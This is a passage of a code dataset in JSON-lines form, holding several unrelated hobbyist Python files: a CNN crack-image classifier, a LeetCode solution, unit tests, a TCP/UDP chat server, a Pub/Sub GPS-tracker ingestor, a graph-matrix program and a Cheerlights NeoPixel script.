layers.Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding=\"same\")(x)\r\n x = layers.Activation(\"relu\")(x)\r\n x = layers.BatchNormalization()(x)'''\r\n\r\n # Add a new conv layer\r\n '''x = layers.Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1), padding=\"same\")(x)\r\n x = layers.Activation(\"relu\")(x)\r\n x = layers.BatchNormalization()(x)'''\r\n\r\n x = depthwise_conv_block(x,128, alpha, depth_multiplier,kernel_size=(3,3), strides=(1,1))#11*11*128\r\n #x = layers.MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(x)#5*5*8\r\n #x = layers.Dropout(rate=Dropoutrate)(x)\r\n\r\n # x = layers.Flatten()(x)\r\n # x = layers.Dense(48)(x)\r\n # x = layers.Activation(\"relu\")(x)\r\n # x = layers.BatchNormalization()(x)\r\n # x = layers.Dropout(rate=Dropoutrate)(x)\r\n '''1.全连接层\r\n x = layers.Dense(96)(x)\r\n # x = layers.Activation(\"relu\")(x)\r\n # x = layers.BatchNormalization()(x)\r\n # x = layers.Dropout(rate=Dropoutrate)(x)\r\n '''\r\n\r\n\r\n # # always softmax\r\n # if classes == 1111:\r\n # activation = \"sigmoid\"\r\n # units = 1\r\n # else:\r\n # activation = \"softmax\"\r\n # units = classes\r\n\r\n #x = layers.Dense(units)(x)\r\n #outputs = layers.Activation(activation=activation)(x)\r\n #outputs = layers.Dense(units=units, activation=activation)(x)\r\n x = layers.GlobalAveragePooling2D()(x) # 通道维度上对size维度求平均\r\n \r\n # 超参数调整卷积核(特征图)个数\r\n shape = (1, 1, int(128 * alpha))\r\n #shape = (1, 1, 1024)\r\n # 调整输出特征图x的特征图个数\r\n x = layers.Reshape(target_shape=shape)(x)\r\n \r\n # Dropout层随机杀死神经元,防止过拟合\r\n x = layers.Dropout(rate=dropout_rate)(x)\r\n \r\n # 卷积层,将特征图x的个数转换成分类数\r\n x = layers.Conv2D(classes, kernel_size=(1,1), padding='same')(x)\r\n \r\n # 经过softmax函数,变成分类概率\r\n x = layers.Activation('softmax')(x)\r\n \r\n # 重塑概率数排列形式\r\n x = layers.Reshape(target_shape=(classes,))(x)\r\n\r\n\r\n print(type(inputs))\r\n print(type(x))\r\n outputs = Model(inputs, x)\r\n return outputs\r\n\r\n\r\n# Read IMAGE file Path and Label 从文件里读取图片并与标签对应,相当于构建数据集\r\n# normal--0, crack--1\r\ndef IMG_Lst(dataset_root):\r\n images_list = np.array([])\r\n labels_list = np.array([])\r\n '''zm change 2021.4.26 修改输入的路径'''\r\n # 制作网络模型所需数据集即让图片和对应的标签信息对应,normal为正常图片,crack为含裂缝图像 \r\n for root, dirs, files in os.walk(dataset_root + '/normal'):\r\n for file in files:\r\n images_list = np.append(images_list, root + '/' + file)\r\n labels_list = np.append(labels_list,[0])\r\n for root, dirs, files in os.walk(dataset_root + '/crack'):\r\n for file in files:\r\n images_list = np.append(images_list, root + '/' + file)\r\n labels_list = np.append(labels_list,[1])\r\n return images_list, labels_list\r\n\r\ndef IMG_RD(images_list, label_list, Image_resize):\r\n img_lst = []\r\n for i in range(len(images_list)):\r\n # cv2.imread(文件名,标记)读入图像 1表示彩色图像 默认为BGR\r\n img_tmp = cv2.imread(images_list.copy()[i], 1)#0表示灰度图像 1表示BGR\r\n img_tmp = cv2.cvtColor(img_tmp, cv2.COLOR_BGR2RGB)#BGR=>RGB\r\n #print(\"---------------------------------------\")\r\n # print(img_tmp.shape)\r\n img_tmp_rsz = cv2.resize(img_tmp, Image_resize, interpolation=cv2.INTER_CUBIC)\r\n # print(\"---------------------------------------\")\r\n # print(img_tmp_rsz.shape)\r\n # print(\"---------------------------------------\")\r\n #img_tmp_rsz = np.expand_dims(img_tmp_rsz, axis=3)\r\n\r\n img_lst.append(img_tmp_rsz)\r\n return np.array(img_lst), label_list\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # *******************************************************************\r\n # Data loading and preprocessing\r\n\r\n \r\n # 读取训练数据集及测试/验证数据集的RGB图像,将所有图像resize为image_size的大小\r\n images_list, labels_list = IMG_Lst('C:/Users/13291/Desktop/dcds/CHECK')#Concrete Crack Images for Classification\r\n Trainset_image, Trainset_label = IMG_RD(images_list, labels_list, Image_resize)\r\n Trainset_label_one_hot = tf.keras.utils.to_categorical(Trainset_label, num_classes=2)\r\n print('Read Images Done!')\r\n print(np.size(Trainset_image))\r\n # 随机打乱图像信息\r\n c = list(zip(Trainset_image, Trainset_label, Trainset_label_one_hot)) # 将a,b整体作为一个zip,每个元素一一对应后打乱\r\n c = [i for i in c]\r\n random.shuffle(c) # 打乱c\r\n Trainset_image[:], Trainset_label[:], Trainset_label_one_hot[:] = zip(*c) # 将打乱的c解开'''\r\n\r\n # *******************************************************************\r\n # Building Models with Keras\r\n # input_shape=(rows, cols, channels) data_format='channels_last'(default).\r\n model = make_model_MobileNetV1(classes=2, # 分类种类数\r\n input_shape=[99,99,3], # 模型输入图像shape\r\n alpha=1.0, # 超参数,控制卷积核个数\r\n depth_multiplier=1, # 超参数,控制图像分辨率\r\n dropout_rate=1e-3) # 随即杀死神经元的概率)\r\n model.summary()\r\n\r\n # ******************************************************************\r\n # 模型编译及训练\r\n model.compile(\r\n optimizer=\"adam\", # keras.optimizers.Adam(),\r\n loss=\"categorical_crossentropy\", # keras.losses.mean_squared_error, # \"categorical_crossentropy\",\r\n metrics=['accuracy', keras.metrics.categorical_accuracy] # [keras.metrics.binary_accuracy] # [\"accuracy\"]\r\n )\r\n \r\n filepath=\"C:/Users/13291/Desktop/dcds/1.03_weights.best.h5\"\r\n #保存最佳模型\r\n checkpoint = ModelCheckpoint(filepath, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')\r\n callbacks_list = [checkpoint]\r\n \r\n history = model.fit(\r\n Trainset_image, Trainset_label_one_hot,\r\n epochs=epochs,\r\n batch_size=BATCH_SIZE,\r\n callbacks=callbacks_list,\r\n validation_split = 0.2, #从测试集中划分80%给训练集\r\n #validation_freq = 1, #测试的间隔次数为1\r\n #validation_data = (Trainset_image * 1.0 / 255, Trainset_label_one_hot),\r\n # callbacks=callbacks,\r\n )\r\n\r\n model.save('C:/Users/13291/Desktop/dcds/1.03_CrackImage_v1.00_Model_b%d_e%d_d%f.h5' % (BATCH_SIZE, epochs, Dropoutrate))\r\n \r\n # ******************************************************************\r\n #验证集准确度曲线图\r\n val_accuracy = history.history['val_accuracy']\r\n epochs_range = range(epochs)\r\n plt.figure(figsize=(8, 8))\r\n plt.plot(epochs_range, val_accuracy, label='Validation Accuracy')\r\n plt.legend(loc='lower right')\r\n plt.title('Validation Accuracy')\r\n plt.savefig('C:/Users/13291/Desktop/dcds/1.03_val_accuracy_b%d_e%d_d%f_1.jpg' % (BATCH_SIZE, epochs, Dropoutrate))\r\n plt.show()\r\n \r\n #验证集loss曲线图\r\n val_loss = history.history['val_loss']\r\n epochs_range = range(epochs)\r\n plt.figure(figsize=(8, 8))\r\n plt.plot(epochs_range, val_loss, label='Validation Loss')\r\n plt.legend(loc='lower right')\r\n plt.title('Validation Loss')\r\n plt.savefig('C:/Users/13291/Desktop/dcds/1.03_Validation_loss_b%d_e%d_d%f.jpg' % (BATCH_SIZE, epochs, Dropoutrate))\r\n plt.show()\r\n \r\n \r\n # ******************************************************************a\r\n # 测试数据集的验证\r\n # 读取训练数据集及测试/验证数据集的RGB图像,将所有图像resize为image_size的大小\r\n # images_list, labels_list = IMG_Lst('Concrete Crack Images for Classification')\r\n # Testset_image, Testset_label = IMG_RD(images_list, labels_list, Image_resize)\r\n # Testset_label_one_hot = keras.utils.to_categorical(Testset_label, num_classes=2)\r\n # print('Read Images Done!')\r\n #\r\n # # load model\r\n # model = keras.models.load_model('1.03_weights.best.h5')\r\n # loss_and_metrics = model.evaluate(Testset_image, Testset_label_one_hot)\r\n # print(loss_and_metrics)\r\n # Testset_pred = model.predict(Testset_image, batch_size=BATCH_SIZE)\r\n # Testset_pred_label = np.argmax(Testset_pred, axis=1)\r\n # print(\"Test Accuracy = \", (Testset_pred_label == Testset_label).mean() * 100)\r\n #Trainset_pred = model.predict(Trainset_image, batch_size=BATCH_SIZE)\r\n #Trainset_pred_label = np.argmax(Trainset_pred, axis=1)\r\n #print(\"Train Accuracy = \", (Trainset_pred_label == Trainset_label).mean() * 100)\r\n\r\n # 绘制ROC 计算AUC # 在windows下完成\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TVT233/Crack-detection-CNN-","sub_path":"CrackImage.py","file_name":"CrackImage.py","file_ext":"py","file_size_in_byte":13119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70376253371","text":"\"\"\"\nYou are given a large integer represented as an integer array digits, where each digits[i] is the ith digit of the integer. \nThe digits are ordered from most significant to least significant in left-to-right order. The large integer does not contain any leading 0's.\n\nIncrement the large integer by one and return the resulting array of digits.\n\nExample 1:\n\nInput: digits = [1,2,3]\nOutput: [1,2,4]\nExplanation: The array represents the integer 123.\nIncrementing by one gives 123 + 1 = 124.\nThus, the result should be [1,2,4].\nExample 2:\n\nInput: digits = [4,3,2,1]\nOutput: [4,3,2,2]\nExplanation: The array represents the integer 4321.\nIncrementing by one gives 4321 + 1 = 4322.\nThus, the result should be [4,3,2,2].\nExample 3:\n\nInput: digits = [9]\nOutput: [1,0]\nExplanation: The array represents the integer 9.\nIncrementing by one gives 9 + 1 = 10.\nThus, the result should be [1,0].\n\n\nSolution:\n loop the list in reverse order that is last element first, if the increment by one is remainder with 10 is zero then increment next digit by and come out of\n loop note while coming out set the increment to false, lastly check if still increment is present then insert 1.\n\n\"\"\"\n\n\nclass Solution(object):\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n break_it = False\n increment = False\n length = len(digits)\n for i in range(length):\n last_index = length - i - 1\n digit = digits[last_index]\n increment_by_1 = digit+1\n remainder = increment_by_1%10 \n if remainder == 0:\n digits[last_index] = 0\n increment = True\n else:\n digits[last_index] = increment_by_1\n increment = False\n break_it = True\n if break_it:\n break\n if increment:\n digits.insert(last_index, 1)\n\n return digits","repo_name":"LaxminarayanaV7416/javaPractice","sub_path":"DSAlgoPracPython/plus_one.py","file_name":"plus_one.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18862750175","text":"import unittest\nfrom poo_python.exos_facile.exo1 import Rectangle\n\n# création d'une classe de test\n\nclass TestExo1(unittest.TestCase):\n \n def setUp(self):\n self.calcul = Rectangle(5, 10)\n self.calcul2 = Rectangle(3, 4)\n self.calcul3 = Rectangle(\"m\", 4)\n \n def tearDown(self):\n del self.calcul\n del self.calcul2\n del self.calcul3\n \n def test_surface(self):\n self.assertEqual(self.calcul.surface(), 50)\n self.assertEqual(self.calcul2.surface(), 12)\n with self.assertRaises(Exception) as context:\n self.calcul3.surface()\n self.assertTrue(\"error\" in str(context.exception))\n \n# pour lancer le script de test\n# if __name__ == '__main__':\n# unittest.main()\n","repo_name":"Franec59/uniteCI","sub_path":"testExo1.py","file_name":"testExo1.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3714232995","text":"import json\nimport os\n\nimport requests\nfrom pip_services4_components.config import ConfigParams\nfrom pip_services4_components.refer import References, Descriptor\n\nfrom ..Dummy import Dummy\nfrom ..DummyService import DummyService\nfrom ..SubDummy import SubDummy\nfrom ..controllers.DummyRestController import DummyRestController\n\n\ndef get_fullpath(filepath):\n return os.path.abspath(os.path.join(os.path.dirname(__file__), filepath))\n\n\nport = 3007\n\nrest_config = ConfigParams.from_tuples(\n 'connection.protocol',\n 'https',\n 'connection.host',\n 'localhost',\n 'connection.port',\n port,\n 'credential.ssl_key_file', get_fullpath('../credentials/ssl_key_file'),\n 'credential.ssl_crt_file', get_fullpath('../credentials/ssl_crt_file')\n)\n\nDUMMY1 = Dummy(None, 'Key 1', 'Content 1', [SubDummy('SubKey 1', 'SubContent 1')])\nDUMMY2 = Dummy(None, 'Key 2', 'Content 2', [SubDummy('SubKey 2', 'SubContent 2')])\n\n\nclass TestDummyCredentialsRestController:\n srv = None\n controller = None\n\n @classmethod\n def setup_class(cls):\n cls.srv = DummyService()\n\n cls.controller = DummyRestController()\n cls.controller.configure(rest_config)\n\n references = References.from_tuples(\n Descriptor(\"pip-controller-dummies\", \"service\", \"default\", \"default\", \"1.0\"), cls.srv,\n Descriptor(\"pip-controller-dummies\", \"controller\", \"http\", \"default\", \"1.0\"), cls.controller\n )\n\n cls.controller.set_references(references)\n\n def setup_method(self, method):\n self.controller.open(None)\n\n def teardown_method(self, method):\n self.controller.close(None)\n\n def test_crud_operations(self):\n # Create one dummy\n response = self.invoke(\"/dummies\", DUMMY1.to_json())\n\n dummy1 = Dummy.from_json(response)\n assert dummy1 is not None\n assert DUMMY1.key == dummy1.key\n assert DUMMY1.content == dummy1.content\n\n # Create another dummy\n response = self.invoke(\"/dummies\", DUMMY2.to_json())\n\n dummy2 = Dummy.from_json(response)\n\n assert dummy2 is not None\n assert DUMMY2.key == dummy2.key\n assert DUMMY2.content == dummy2.content\n\n # dummy_del = self.invoke('/dummies/')\n\n assert 2 == self.controller.get_number_of_calls()\n\n def invoke(self, route, entity):\n params = {}\n route = f\"https://localhost:{port}{route}\"\n response = None\n timeout = 5\n try:\n # Call the service\n data = json.dumps(entity)\n response = requests.request('POST', route, params=params, json=data, timeout=timeout, verify=False)\n return response.json()\n except Exception as ex:\n raise ex\n","repo_name":"pip-services4/pip-services4-python","sub_path":"pip-services4-http-python/test/controllers/test_DummyCredentialsRestController.py","file_name":"test_DummyCredentialsRestController.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37548297045","text":"import socket\nimport threading\n\nserverIP = \"127.0.0.1\"\nserver_port = 9008\nbuff_size = 1024\nbuff_size_udp = 65507\n\n\nclass Server:\n def __init__(self):\n self.server_tcp = None\n self.server_udp = None\n self.threads = []\n self.client_id = 0\n self.sockets = []\n self.nicknames = []\n self.colors = []\n self.addresses = []\n\n # run server (main function)\n def run(self):\n # servers initialization\n self.tcp_initialization()\n self.udp_initialization()\n\n # run udp service - ready to receive and send messages using udp protocol\n self.run_thread(self.udp_service)\n\n # main server loop\n while True:\n print('Waiting for connection...')\n client, address = self.server_tcp.accept()\n print('New client connected!: ', address)\n\n nickname, client_color = self.receive_tcp(client).split('|') # receive client nickname\n print('New client: (%s, %s)' % (self.client_id, nickname))\n\n self.sockets.append(client)\n self.nicknames.append(nickname)\n self.colors.append(client_color)\n self.addresses.append(address)\n\n # create new thread to communication with tcp client\n self.run_thread(self.tcp_service, client, self.client_id, address, nickname, client_color)\n\n self.client_id += 1\n\n # server initialization - TCP socket\n def tcp_initialization(self):\n server_socket_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket_tcp.bind((serverIP, server_port))\n server_socket_tcp.listen() # enable a server to accept connections.\n print('Python server is running - TCP...')\n\n self.server_tcp = server_socket_tcp\n\n # server initialization - UDP socket\n def udp_initialization(self):\n server_socket_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n server_socket_udp.bind((serverIP, server_port))\n print('Python server is running - UDP...')\n\n self.server_udp = server_socket_udp\n\n # receive message from client using UDP\n def receive_udp(self):\n data, address_udp = self.server_udp.recvfrom(buff_size_udp)\n # data = data.decode('utf-8')\n client_id, client_nickname, color = self.get_client_info(address_udp)\n\n print(f'New UDP msg received from ({client_id, client_nickname})!: ', data)\n\n if data == 'EXIT'.encode('utf-8'):\n self.server_udp.sendto(bytes('EXIT', 'utf-8'), address_udp)\n self.server_udp.sendto(bytes('UDP unbind successfully', 'utf-8'), address_udp)\n return None, client_id, client_nickname, address_udp, color\n return data, client_id, client_nickname, address_udp, color\n\n # receive message from client using TCP\n def receive_tcp(self, client_socket, *args):\n data = client_socket.recv(buff_size).decode('utf-8')\n if args:\n print('New msg received from (%d, %s)!: ' % args, data)\n return data\n\n # send message to clients using TCP\n def send_tcp(self, message, sender_socket, sender_nickname, sender_id, color):\n try:\n for sock in self.sockets:\n if sock != sender_socket:\n all_msg = f\"{sender_id}|{sender_nickname}|{message}|{color}\"\n sock.send(bytes(all_msg, 'utf-8'))\n except socket.error as err:\n print('Failed to send message to client: %s' % err)\n\n # send message to clients using UDP\n def send_udp(self, message, sender_address, sender_nickname, sender_id, color):\n for address in self.addresses:\n if address != sender_address:\n info = f\"{sender_id}|{sender_nickname}|{color}\"\n self.server_udp.sendto(bytes(info, 'utf-8'), address)\n self.server_udp.sendto(message, address)\n\n # TCP service using by thread\n def tcp_service(self, client_socket, client_id, client_address, client_name, color):\n try:\n while True:\n received_data = self.receive_tcp(client_socket, client_id, client_name)\n if received_data == 'EXIT' or not received_data:\n client_socket.send(bytes('EXIT', 'utf-8'))\n return\n # send message to clients\n self.send_tcp(received_data, client_socket, client_name, client_id, color)\n\n except socket.error:\n print('Problem with client. Disconnecting...')\n # self.disconnect_client(client_socket, client_address, client_name, client_id, color)\n\n finally:\n self.disconnect_client(client_socket, client_address, client_name, client_id, color)\n\n # UDP service using by thread\n def udp_service(self):\n client_id = ''\n client_nickname = ''\n try:\n print('UDP connection starting\\n')\n while True:\n data, client_id, client_nickname, addr_udp, color = self.receive_udp()\n if data:\n self.send_udp(data, addr_udp, client_nickname, client_id, color)\n finally:\n print(f'UDP connection for ({client_id}, {client_nickname}) closed')\n\n # receive responses from server using new thread\n # (udp_service = first thread, tcp_service = second thread)\n def run_thread(self, target_fun, *args):\n if args:\n thread_args = args\n else:\n thread_args = ()\n\n thr = threading.Thread(target=target_fun, args=thread_args)\n thr.daemon = True\n self.threads.append(thr)\n thr.start()\n\n # disconnect client - remove from server 'db' (client, client_nicknames arrays)\n def disconnect_client(self, client_socket, client_address, client_name, client_id, color):\n self.sockets.remove(client_socket)\n self.addresses.remove(client_address)\n self.nicknames.remove(client_name)\n self.colors.remove(color)\n\n print(f\"Client: ({client_id}, {client_name}) left the server\")\n client_socket.close()\n\n # get info about client sending msg by UDP\n def get_client_info(self, address_udp):\n # get index of address_udp from clients addresses array\n address_id = self.addresses.index(address_udp)\n\n # find client nickname and color\n color = self.colors[address_id]\n nickname = self.nicknames[address_id]\n\n return address_id, nickname, color\n\n def stop(self):\n self.server_udp.close()\n self.server_tcp.close()\n\n\nif __name__ == \"__main__\":\n server = Server()\n server.run()\n","repo_name":"dmncp/Python-Chat","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16738145065","text":"from google.cloud import pubsub\nimport datetime\nimport requests\nimport pytz\nimport json\nimport time\nimport os\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"/app/application_default_credentials.json\"\n#os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"/home/kali/iot-projects/ioh-stp/ingestor-sm/application_default_credentials.json\"\n\nos.environ.setdefault(\"GCLOUD_PROJECT\", \"ioh-simulator\")\n\n#from google.oauth2 import service_account\n\n#credentials = service_account.Credentials.from_service_account_file(\"/home/kali/iot-projects/ioh-stp/ingestor-sm/application_default_credentials.json\")\n#client = language.LanguageServiceClient(credentials=credentials)\n\n# Imports the Cloud Logging client library\nimport google.cloud.logging\n\n# Instantiates a client\nclientlog = google.cloud.logging.Client()\n\n# Retrieves a Cloud Logging handler based on the environment\n# you're running in and integrates the handler with the\n# Python logging module. By default this captures all logs\n# at INFO level and higher\nclientlog.setup_logging()\n\nimport logging\n\ndef publish_pubsub(project_id,topic_id, msg):\n publisher = pubsub.PublisherClient()\n topic_path = publisher.topic_path(project_id, topic_id)\n\n data_str = json.dumps(msg,separators=(',',':'))\n # Data must be a bytestring\n data = data_str.encode(\"utf-8\")\n # When you publish a message, the client returns a future.\n future = publisher.publish(topic_path, data)\n\n print(future.result())\n print(f\"Published messages to {topic_path}.\")\n return future.result()\n \ndef stream_data(url):\n # Get the URL\n global last_data\n response = requests.get(url)\n\n status = response.json()['DEVICE']['STATUS']\n command = response.json()['DEVICE']['COMMAND']\n ndata = response.json()['DEVICE']['NDATA']\n \n time_local = response.json()['DEVICE']['DATA'][0]['TIME']\n local = pytz.timezone('Asia/Jakarta')\n naive = datetime.datetime.strptime(time_local,\"%Y-%m-%d %H:%M:%S\")\n local_dt = local.localize(naive, is_dst=None)\n utc_dt = local_dt.astimezone(pytz.utc)\n timestamp = int(round(utc_dt.timestamp()*1000))\n \n imei = response.json()['DEVICE']['DATA'][0]['IMEI']\n name = response.json()['DEVICE']['DATA'][0]['NAME']\n longitude = response.json()['DEVICE']['DATA'][0]['LONGITUDE']\n latitude = response.json()['DEVICE']['DATA'][0]['LATITUDE']\n speed = response.json()['DEVICE']['DATA'][0]['SPEED']\n heading = response.json()['DEVICE']['DATA'][0]['HEADING']\n moving = response.json()['DEVICE']['DATA'][0]['MOVING']\n\n if moving == \"0\":\n moving = False\n else:\n moving = True\n\n battery = response.json()['DEVICE']['DATA'][0]['BATTERY']\n main_voltage = response.json()['DEVICE']['DATA'][0]['MAIN_VOLTAGE']\n gsm_signal = response.json()['DEVICE']['DATA'][0]['GSM_SIGNAL']\n address = response.json()['DEVICE']['DATA'][0]['ADDRESS']\n\n mylist = {\n \"type\" : \"inboundDataEventMsg\", \n \"networkId\" : \"tracker-fmc130-netw-dummy1\", \n \"deviceId\" : str(imei)+'-dummy1', #macId\n \"aliasKey\" : \"imei\",\n \"data\": [\n { \"path\" : \"status\", \"value\" : status},\n { \"path\" : \"command\", \"value\" : command},\n { \"path\" : \"ndata\", \"value\" : ndata},\n { \"path\" : \"data/time\", \"value\" : timestamp},\n { \"path\" : \"data/imei\", \"value\" : str(imei)+'-dummy1'},\n { \"path\" : \"data/position/lat\", \"value\" : float(latitude)},\n { \"path\" : \"data/position/lon\", \"value\" : float(longitude)},\n { \"path\" : \"data/speed\", \"value\" : speed},\n { \"path\" : \"data/heading\", \"value\" : heading},\n { \"path\" : \"data/moving\", \"value\" : moving},\n { \"path\" : \"data/battery\", \"value\" : battery},\n { \"path\" : \"data/main_voltage\", \"value\" : main_voltage},\n { \"path\" : \"data/gsm_signal\", \"value\" : gsm_signal},\n { \"path\" : \"data/address\", \"value\" : address},\n ]}\n\n project_id = 'ioh-simulator'\n topic_id = 'default-processor'\n\n\n if (last_data == None) or (last_data['DEVICE']['DATA'][0]['IMEI'] == imei and last_data['DEVICE']['DATA'][0]['TIME'] != time_local):\n msgID = publish_pubsub(project_id,topic_id, mylist)\n last_data = response.json()\n logging.info(json.dumps(response.json()))\n\nlast_data = None\n\ntry:\n while True:\n stream_data(\"https://mamigo.id/api/realtime/63f0a743e1e121845a4967c85f571dde\")\n time.sleep(10)\n\nexcept KeyboardInterrupt:\n print(\"exiting\")\n client.disconnect()\n client.loop_stop()\n","repo_name":"riyandig71/ingestors","sub_path":"mcpTracker_main_v2.py","file_name":"mcpTracker_main_v2.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3942468740","text":"import numpy as np\r\n# 2)Написать код для вывода списка смежности, матрицы смежности и матрицы инцидентности, если задаются графы ребрами\r\n# т.е. парами вершин. Учитывать, ориентированный или неориентированный граф.\r\n\r\n# инпуты Количество ребер, количество связей\r\n\r\ndef filling_list(ribs):\r\n RibsList = [0] * ribs\r\n for i in range(ribs):\r\n print(\"Введите ребро №\", i + 1)\r\n RibsList[i] = [int(input()), int(input())]\r\n print(\"Пары вершин\")\r\n print(RibsList)\r\n return RibsList\r\n\r\ndef adjacency_matrix(LenghtList, ribs, RibsList):\r\n print(\"Матрица смежности\")\r\n adjacency_matrix_list = [0] * LenghtList\r\n for i in range(LenghtList):\r\n adjacency_matrix_list[i] = [0] * LenghtList\r\n\r\n if flag == 1:\r\n coefficient = -1\r\n else:\r\n coefficient = 1\r\n\r\n for i in range(ribs):\r\n a = RibsList[i][0]\r\n b = RibsList[i][1]\r\n if RibsList[i][0] != RibsList[i][1]:\r\n adjacency_matrix_list[a - 1][b - 1] = 1\r\n adjacency_matrix_list[b - 1][a - 1] = 1 * coefficient\r\n\r\n print(np.matrix(adjacency_matrix_list))\r\n return adjacency_matrix_list\r\n\r\ndef adjacency_list(adjacency_matrix_list, LenghtList, ribs):\r\n print(\"Список смежности\")\r\n for i in range(LenghtList):\r\n temp_list = [i+1]\r\n for j in range(LenghtList):\r\n a = j + 1\r\n if adjacency_matrix_list[i][j] == 1:\r\n temp_list.append(a)\r\n\r\n print(np.array(temp_list))\r\n temp_list.clear()\r\n\r\ndef incidence_matrix(LenghtList, ribs, RibsList,):\r\n print(\"Матрица инцидентности\")\r\n incidence_matrix_list = [0] * LenghtList\r\n for i in range(LenghtList):\r\n incidence_matrix_list[i] = [0] * ribs\r\n\r\n if flag == 1:\r\n coefficient = -1\r\n else:\r\n coefficient = 1\r\n\r\n for i in range(ribs): # Столбец\r\n a = RibsList[i][0] # 1\r\n b = RibsList[i][1] # 4\r\n incidence_matrix_list[a-1][i] = 1 # Строка\r\n incidence_matrix_list[b-1][i] = 1 * coefficient\r\n print(np.matrix(incidence_matrix_list))\r\n\r\n\r\n#adjacency_matrix_list = [] # матрица смежности\r\nprint(\"Какой граф?\\n 1 - Ориентированнай\\n 2 - Неориентированный\")\r\nflag = int(input())\r\n\r\nprint(\"Введите количество ребер\")\r\nribs = int(input()) # ребра\r\n# Заполнение массива\r\nRibsList = filling_list(ribs)\r\n\r\n# количество вершин\r\nLenghtList = len(set(sum(RibsList, [])))\r\nprint(\"Количество вершин \",LenghtList)\r\n\r\n# Матрица смежности\r\nadjacency_matrix_list = adjacency_matrix(LenghtList, ribs, RibsList)\r\n\r\n# Список смежности\r\nadjacency_list(adjacency_matrix_list, LenghtList, ribs)\r\n\r\n# Матрица Инцидентности\r\nincidence_matrix(LenghtList, ribs, RibsList)","repo_name":"Girmoonzdtax/Graf","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19125304865","text":"\"\"\"\nThis micropython script will make regular requests to the cheerlights api\nand parse out the latest 'color' information using the\n'ujson' method. \nA counter is reset with each new color and incremented with each\nsubsequent same color cycle.\n\n@authors George Kaimakis and Russ Winch\n@version December 2017\n\"\"\"\n\nimport gc\nimport sys\nimport time\nimport urequests\nimport urandom\nimport neopixel\nfrom machine import Pin, ADC\n\ntry:\n import wifi\nexcept ImportError:\n print()\n print(\"'wifi' module not found.\")\n print()\n\ndef api_request(url):\n feed = urequests.get(url)\n return feed.json()['field1']\n\ndef new_neopixel_color(color, colors):\n \"\"\"check the color is valid and return RGB values\"\"\"\n if color in colors:\n return colors[color]\n print(\"not a valid Cheerlights colour\")\n return colors['red'] # default to red\n\ndef neopixel_write(neo, color, *args):\n if len(args) == 1:\n i = args[0]\n neo[i].fill(color)\n neo[i].write()\n # ignore none or too many arguments\n else:\n for i in range(len(neo)):\n neo[i].fill(color)\n neo[i].write()\n\ndef neopixel_blank(neo):\n neopixel_write(neo, (0,0,0))\n\ndef neopixel_confirm(neo, value, colors):\n \"\"\"This function determines the return value from the wifi() call and\n flashes the neopixels accordingly, green for wifi success, and red for wifi failure\n or for an invalid bool return.\n \"\"\"\n if value == True:\n color = colors['green']\n np_flash(neo, color) # uses default kwargs\n return True\n elif value == False:\n color = colors['red']\n np_flash(neo, color) # uses default kwargs\n return False\n else:\n print(\"Not a boolean value!\")\n color = colors['purple']\n np_flash(neo, color, num_of_flashes=6, duration=150)\n return False\n\ndef np_flash(neo, color, *, num_of_flashes=3, duration=300):\n \"\"\"This function flashes the neopixel(s) in terms of number of flashes and\n duration value in milliseconds.\n Note: function accepts keyword-only arguments.\n \"\"\"\n for i in range(num_of_flashes):\n neopixel_write(neo, color)\n time.sleep_ms(duration)\n neopixel_blank(neo)\n time.sleep_ms(duration)\n\ndef color_transition(neo, previous, target):\n \"\"\"compares previous and target rgb values & calculates the transition.\n writes to the neopixel & returns the new color value to the caller to be\n asigned as the next previous_rgb value.\n \"\"\"\n speed = 25 # ms delay after each transition\n new = list(previous)\n if target != previous:\n for i, _ in enumerate(previous):\n if previous[i] < target[i]:\n new[i] += 1\n elif previous[i] > target[i]:\n new[i] -= 1\n neopixel_write(neo, new)\n time.sleep_ms(speed) # smooth the transition\n return tuple(new)\n\n\ndef main():\n # look-up color dict - api 'field1' is used as the key:\n colors = {\n 'red': (255,0,0),\n 'orange': (211,84,0),\n 'yellow': (254,183,12),\n 'green': (0,128,0),\n 'cyan': (0,255,255),\n 'blue': (0,0,255),\n 'purple': (128,0,128),\n 'magenta': (255,0,255),\n 'pink': (254,52,62),\n 'white': (255,255,230),\n 'oldlace': (255,200,130),\n 'warmwhite': (255,200,130),\n # 'red': (255, 0, 0),\n # 'orange': (255, 30, 0),\n # 'yellow': (255, 110, 1),\n # 'green': (0, 255, 0),\n # 'cyan': (0, 255, 255),\n # 'blue': (0, 0, 255),\n # 'purple': (128, 0, 128),\n # 'magenta': (255, 0, 50),\n # 'pink': (255, 40, 50),\n # 'white': (255, 255, 170),\n # 'oldlace': (255, 150, 50),\n # 'warmwhite': (255, 150, 50)\n }\n\n\n host = 'https://thingspeak.com/'\n topic = 'channels/1417/feeds/last.json'\n api = host + topic\n\n\n neopixels = [] # holder for the neo pixels\n pixel_pins = [0] # D3\n num_pixels = 1 # leds per 